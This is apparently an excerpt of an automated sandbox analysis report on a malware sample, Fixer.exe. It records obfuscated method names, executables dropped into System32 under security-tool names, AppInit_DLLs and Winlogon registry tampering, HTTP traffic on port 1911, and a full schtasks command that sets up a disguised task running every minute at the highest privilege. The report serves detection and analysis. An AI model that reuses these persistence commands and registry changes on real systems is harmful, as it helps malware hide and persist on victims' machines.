                      Source: Defender.exe.3.dr, jDcxkJFhdsO.csHigh entropy of concatenated method names: 'ZVTlUGzgCUxzHTc', 'pLyoVESOrBkIzZvCXj', 'MjNkMsfBPGdpQhesSuawUD', 'tSVqgcZubYd', 'rcalvpCDHNMTbV', 'dIxnVJfTSqCzYpMCRmRm', 'rIfGRAwfFCOKvw', 'dlIGMIHvsqeNvLvgKjRlA', 'gDJinMnnodsaYge', 'ZHjMmPnmBUKWD'
                      Source: Defender.exe.3.dr, VgiXrAmmXM.csHigh entropy of concatenated method names: 'RlSpcTxUImVHRJThXP', 'UFtJFrybKqoQQdWbgICKPSM', 'PAZQNYTOWgsWXcMy', 'rneUWEdvinYVFcBsZtF', 'iOmWZtklADDvEfX', 'izsvvVekutRDrdyiHfw', 'BHvdTruejdQZEVJaBJW', 'jBcfbguXFVoYj', 'ebEPcDbAAQcrzVTXhxJjtzeP', 'mxWYOospJq'
                      Source: Defender.exe.3.dr, EiphzSFywDsQvfJ.csHigh entropy of concatenated method names: 'UguORtUtzui', 'dkKlBYhllU', 'PQlvpndBHrv', 'ulpsNbUzFBfoNQWBjyB', 'AZfxgyeGWsbIhFQA', 'fUKRUAOlwiYQb', 'IqbeUFrMPwNdNZW', 'HAWpDeqCfYQL', 'QGpuZSSGbwuUTFODrnoPp', 'YumPezZyvofczqYioH'
                      Source: Defender.exe.3.dr, nkKpBsREeeBrrJgLniKFn.csHigh entropy of concatenated method names: 'uPkrNGBgDoNjgrSgOmrox', 'tJdcdXdhIRyApvFJfLCy', 'NeIdpsHUXOypNVbNkc', 'CWfvlfBXaEHglzFgfUz', 'eWMkDzLcZdwuiYvEhiXynU', 'QQiNpHpwtlozgKuslTZ', 'xINxNDBywxBAJqvUUmWUkgDJu', 'PumplfOWiICkzlGrA', 'jnpqOZXzwFOQFDDpoHLGLWmn', 'nSkmkNsgHZHi'
                      Source: Defender.exe.3.dr, DDkXafHupjcDyMCFpVaefrMq.csHigh entropy of concatenated method names: 'qCGRdOsVhMwopUbX', 'jnSGDElovbagPMrtBj', 'BdLVjhRzGQzBzHCIZY', 'nyUdhmSpSAEunk', 'WzXRjZmEfXvZaZNDSVmwdgzei', 'ryzBWMRAkCkHopA', 'pFlNsPEwmZBoUpAtjShnEdBj', 'aoKTKgxvjqts', 'YbuDOwKdfuCrXWHN', 'LECFRbtdbtDslzGBOtFtAP'
                      Source: Defender.exe.3.dr, OLCRwsTtwxxSGZuMngxi.csHigh entropy of concatenated method names: 'STWcrGlCPAYMVdXTCakSo', 'EXEssEuclOoxwsgoE', 'hrgwYFkwWskGMPwuOyYzO', 'HnPKYYhfmOVykwrHyyHw', 'BreCYBCdhQEYAjshOhMP', 'FWkNfzCGAZsRAFwkIzWfBFx', 'akNzakQugqwUtot', 'zXhqLGzdww', 'hqkpAZTnumC', 'PJylKJbrTFUfeXGFTkj'
                      Source: Defender.exe.3.dr, JqoyJMwYkYeSSSLBCERtJfL.csHigh entropy of concatenated method names: '_003CRun_003Eb__1_0', 'eiLcBLWnxSzTbooKAH', 'jdfmOziWNDFxt', 'shTrcPinsNklrCmXVRYOlwywx', 'TpJjrUFVjGVTYscvlSC', 'IfkphnZeMviWtzvseI', 'PfVTfCCtglpKgtVV', 'FTBDubJoYyZZwjRdwmwmME', 'fustWkCcYdHnKGSUEMfHE', 'UkBYhkHYicAhWJCimD'
                      Source: Defender.exe.3.dr, WpAqmEEzEwNIXIzRzOYiu.csHigh entropy of concatenated method names: 'xCQxqDhktAiNXUabbXDUuhnau', 'tGJXUzpZsyZoNASUCMZJk', 'rXnAeZCPPqDFKaaVgjX', 'ccBmJDCafaAkANPljUVQWcijl', 'pstggqmlDOVB', 'aXcjopSFwKplLNHcztSABNK', 'zuKyOKBQidutustuTCsh', 'uUcfJDVDApN', 'ukueUqmJZDiTO', 'GzXhyUcdEZiTEGfMhohg'
                      Source: Defender.exe.3.dr, avfHckAjbIOftjcvbDvZXrf.csHigh entropy of concatenated method names: 'YzCIvbnXWQBODZHdYFCd', 'NKwQlKHrQVjPyjchr', 'zUrIdiNsBvRASoBJKpGrKQ', 'fFvSzEqevhRCJgEhNCs', 'LZQDuOpYnbzd', 'oLDhQOoLRVSAlscGHspR', 'UGprXkORrUhn', 'UVAzxnEwuDxCIVNR', 'jKMaTENqsdZuZBlNSYH', 'IuBMMaCspOP'
                      Source: Defender.exe.3.dr, XOWrfubIFwwWSRBCkfv.csHigh entropy of concatenated method names: 'GzXbQMXAGN', 'mwxeQIuYrPpc', 'GQHFLAVEzNYYrvaTWaCrnJZ', 'mltpHDkRXfUAESpG', 'DniZGZMUFVonkExqmSZGgxv', 'HBMaaOElvzkVqvgMhVB', 'wdmaXKSzPzMGrFRFNlur', 'DrkUbzqmNZKwMhd', 'lDQvEVvmdeleaz', 'aKSslBFwKbMBaBKeYorbievL'
                      Source: Defender.exe.3.dr, UACsUQnggztSoYk.csHigh entropy of concatenated method names: 'VdSINmzcYlFUDFbLWy', 'fqUxahHlBoZLppD', 'uGVDiBZTjLSdbYhvpFF', 'AgsaFAyozZPezcgFBvkeR', 'OOOdKcHeWj', 'QcOOuxhClUJvodzrcutVa', 'zRdMbqVhVDgujzRq', 'yCbfgETazKke', 'cNJvcwliVrhEyGPuuzaln', 'TzpSNJlcfkClbSkoWUFYdLub'
                      Source: Defender.exe.3.dr, JfAFbFqmPAXuSFACrag.csHigh entropy of concatenated method names: 'RkDnIXrgyetV', 'sVHoXFlXRvG', 'epDDikiPXN', 'cMxDNKolHBpajsOTV', 'kzpwkehncPuKFgfxebaBXNcK', 'ApPTLUQNUnNjgcSWaiYqwwIum', 'msUXXWfxkpRTRu', 'xktSOyzIexfETCEgVhx', 'YsxQqEirdEGQdNzLPcYO', 'kpZrSLvgIwlTMEEnccKQHe'
                      Source: Defender.exe.3.dr, fxrViPtroaCbyONKrcHijo.csHigh entropy of concatenated method names: 'cGXWrGRrNpktfJDBwyi', 'MCfobByeOtYEqSPP', 'tBkWiomOVhBoa', 'kBSSZbjvpHncU', 'gCNtoqDwxzdOsZF', 'xqoioCXzpobxMdjF', 'ViSUHzkHnEToLiJp', 'JxolcdfNDAPGjTPY', 'XrnzqqEbAxDKeGRHrTmQisEn', 'DzUADkEQRKS'
                      Source: Defender.exe.3.dr, GprCBzVajSFPhcvMz.csHigh entropy of concatenated method names: '_003CPatchMem_003Eb__0', 'WYpgNUnjwEYMhBcgWYlMeqbwj', 'NMmrnMiPoxTKxWYciysWlr', 'QuyKVUgxswZG', 'wFQLeSMeNMbPoBIdEM', 'WEVxpCMvIA', 'NYQxfchgsTfdDiXvhS', 'UokWjXaHbJRXEemyC', 'rWfvXTjrbSPRGfcjfldCgaFVG', 'bwbyQjVwqwtZQQnsv'
                      Source: Defender.exe.3.dr, AgGuxbclsJDKUXCF.csHigh entropy of concatenated method names: 'PgBtGwUrqzqNZCUoKeqOHE', 'uciUipnmdWskfbbukmD', 'bmYTGiVKsMrg', 'AGRXclBCMNqgS', 'NikFbDwDHDPNAUcuQfMZeU', 'XHABEPZhmotIb', 'GPcOxzNHOlha', 'wLTsKsYMybBrniW', 'ZGMAlKPjKgVwPtOUex', 'VTvjPDvIobXKQreofUZ'
                      Source: Defender.exe.3.dr, NCWTJiYmOo.csHigh entropy of concatenated method names: 'fdXRNOXStt', 'qgnMDAxeooZwPsjKWKTw', 'HeaGYfIPuIRJgLpfweYojzNG', 'HZdEBIZwljCMFeUpPufH', 'jgteZfvHMIRUZRGeLtArN', 'cnSrADyUFhyuYskZbceoZalr', 'NOLEAfPZoEGMifrIrDjW', 'tOumSXNYVBCaKnpnQEC', 'UkodNsxnfhXBVBUzRSiH', 'ASCDlYsCVb'
                      Source: Defender.exe.3.dr, qmajBmcCnsP.csHigh entropy of concatenated method names: '_003CCheckWMI_003Eb__4_0', 'akoWoQJegFQzWGz', 'sLLtHQapfaLkpD', 'GhBLeixaxKaECT', 'FDgyYJtcIK', 'yqNEYpdrKSVuU', 'ukOigLYWdVIEqeEMEsBU', 'HMsllbLJjkILQeYfubylc', 'swUyynxOdtAxn', 'VxvjMMtlztaAfhKQC'
                      Source: Defender.exe.3.dr, JjNonPeEqnKrhUWFcwVNuQ.csHigh entropy of concatenated method names: 'HumVdnzFHHCRoAp', 'svjgfSSfzqHTWdUvtQGtB', 'ARrhDkeCiEmKcSLjnocHVmgf', 'dmHYXtvlxuSoyPhAxICh', 'ACkJcSRtYNlMy', 'yXeKLqZfXsupYuHYed', 'WcjXOvberZhhczpjdSyrrmVer', 'ntXmAjHObxOzPP', 'MiFqKSpjKeFflGkGFfAIh', 'EYyZNYrUdCjH'
                      Source: Defender.exe.3.dr, XbJdqTwlJhtvvHI.csHigh entropy of concatenated method names: 'cQQnOSFXJkniwgH', 'CtFVrLKWlIexEaFmY', 'XIDtCEWlTGfNocZTtBCm', 'QGuBFnHTjfAKNJzVJr', 'yFrEqYTCXk', 'DklHGCJsxQPSkbeDbSax', 'JAoVYBDdlljjCbQYGCxMQ', 'kjnHdLUsjxmwujwliAFPLefi', 'AOfUQdlTPQFhRYrItCmw', 'ggbUUwGBiGD'
                      Source: Defender.exe.3.dr, TpneWzinmRLNNvomkAusssN.csHigh entropy of concatenated method names: 'IuRdXCfNaLeGuJEFSv', 'zBBLzbjMHFiAa', 'LVbhFPjlxnBRhsbwpa', 'gOaHiRBnqYIrKDfincXNfcODN', 'itrkLPIDuNlOt', 'DctNpwrNCJoTRM', 'EzXtYjIvFMsiHJS', 'ZjHKDiBNRSUriwsyvlpNOUUgv', 'oBwNkEkMPjJCOVyJcFO', 'NITunVTEjEPbPXu'
                      Source: Defender.exe.3.dr, MtweeSvrtsEjaEHkGcqcH.csHigh entropy of concatenated method names: 'DFiwVYdhZUOx', 'YRQgkFOHierWZwABKbbd', 'prwiwWNMSkU', 'WiSpwGWsAVaqZwccgP', 'nUcjaUxnjBuPuXuCNhLNUEk', 'TQFIAukgDrh', 'uzsVyTnrFFfT', 'tOuUBXikZPJPpmpQNMD', 'mIOpqPBQtyOkldHfpMBTyX', 'jjGJgybrtcetlAFe'
                      Source: Defender.exe.3.dr, vFtGvLdAuIQGYPbHNoGtunigD.csHigh entropy of concatenated method names: 'BohTfzMQNzNDrnTSGfvSzctK', 'kQyFHWNDAJoSadRuICctK', 'SabgDkkwZvXjuiNKFdAzqdeAg', 'eYraQRZnxY', 'aScSDktvqiigxwzsKGo', 'bABGMFyeFKHlpgfKXhntlEpT', 'rteRYOhIcCZRWGymOqgbxrQR', 'VdTvKWLhKVLUNhvZcMeFtB', 'oHXOIsyzcMdCkONSfO', 'LkmRAIkBVfmMuUCeomICo'
                      Source: Defender.exe.3.dr, OtMRnVOsGKHl.csHigh entropy of concatenated method names: 'OaJVtSKEyPaxQqAqb', 'AYiHvMpChJPGtAijBpNMbGp', 'PelUWeNCfT', 'MqHfxgrkBosV', 'OhpLdOPujgrRaUfDv', 'batVtuKPgkWnNX', 'LFppCYRDMdKP', 'XMLhFbQvgtnuBN', 'fYvSTJOOqNtoKWgrjexs', 'YohmHMfMBuBLjYoi'
                      Source: Defender.exe.3.dr, ueHNMdjwjYBvgC.csHigh entropy of concatenated method names: 'KVvAMKuWDzYAKXvnmxTAjYSYH', 'HXDGRMJZqUXHDFzIEOodZY', 'lOxMCNlCXtXCXSwiLrkgaP', 'uOBbUEkdOjjSrTzGLFR', 'OfCbpHgcmo', 'NWjDyBlQynPJToAEOMkYbJO', 'OMZmMXIrasVwIQB', 'aoSMyWjnpCR', 'CPPDHSombzDbfX', 'bSDwyLeymqBSsclwKGsp'
                      Source: Defender.exe.3.dr, WYdQIVjMOZZzFKSg.csHigh entropy of concatenated method names: 'xVmIWWPGmNsQwHeZFZzsKD', 'NuZjXgamrjtndQMzBOKVIqvS', 'vZAlToetaYNwnsa', 'aAhCTAJsZydAh', 'WzHRbHaBYuPtDryDNVjJi', 'NPyuPHLUKdMnCOpWQTkZbmn', 'xSuWkIRYEflrShrTp', 'jlhPokNqFQZ', 'ObbZxxNpjCMn', 'WcxEjbQkXCCrhdJIuCAz'
                      Source: Defender.exe.3.dr, sDxpENeYXPsYVcYDBrZBiKvaq.csHigh entropy of concatenated method names: 'lMRPIUZJwfRESTctpRH', 'OqlcEVUlOiIWzabSHIGXy', 'gslwZGZpUeTDP', 'apKnAnvOXvErrJmgKjnCKsrI', 'NMYNeCvKgrRyTXLQRVpshPPD', 'TjQNkhxCqmbWAssIhLSUir', 'clsXBPPywVaKT', 'xvJUwdkjuRcxjADxjFc', 'obsKwmboeAaiZdjPI', 'mObsrauEgP'
                      Source: Defender.exe.3.dr, fIEdZvXcpYAipTNh.csHigh entropy of concatenated method names: 'EgSyrpMyfurJMCyrIsjumlKCY', 'AfbyDBzvzsXWnTre', 'BgSdVCqgadnKTVPaVohXhqp', 'RCFUmFQCIrJVF', 'edkScYMkfXHwReKGLKrILSw', 'tVNkCcLuVcJDnPOR', 'hXiMpnlsBfzewhMgNYHLbiDLN', 'pUGTwwZKevOKEibsAw', 'PYvxWZqGGWyTW', 'OxRliiDElDQSDUZjjhHzxCuWk'
                      Source: Defender.exe.3.dr, huigHuEqBhxV.csHigh entropy of concatenated method names: 'xSzRXLdUGGB', 'ZKUsvmanhRBy', 'vZyEKNVIgqk', 'NjhhmbnhYi', 'jyFuXiXfRAOclfQwtfzt', 'jqhDsFvqNReNpOGE', 'yaILTBzHwBVeuCZ', 'PzHYqfccpDjjPvRJsagYlI', 'phwwEZLTPFYaOy', 'cTxgVQRQrAkMmUVADGj'

                      Persistence and Installation Behavior

                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe; Executable created and started: C:\Windows\System32\Defender.exe
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe; Executable created and started: C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe; File created: C:\Windows\System32\Defender.exe
                      Source: C:\Users\user\Desktop\Fixer.exe; File created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe; File created: C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                      Source: C:\Users\user\Desktop\Fixer.exe; File created: C:\Users\user\AppData\Local\Temp\FixerNerest.exe

                      Boot Survival

                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe; Registry value created: RequireSignedAppInit_DLLs 0
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLs
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows LoadAppInit_DLLs
                      Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST

                      Hooking and other Techniques for Hiding and Protection

                      Source: unknown; Network traffic detected: HTTP traffic on port 49749 -> 1911
                      Source: unknown; Network traffic detected: HTTP traffic on port 1911 -> 49749
                      Source: C:\Users\user\Desktop\Fixer.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
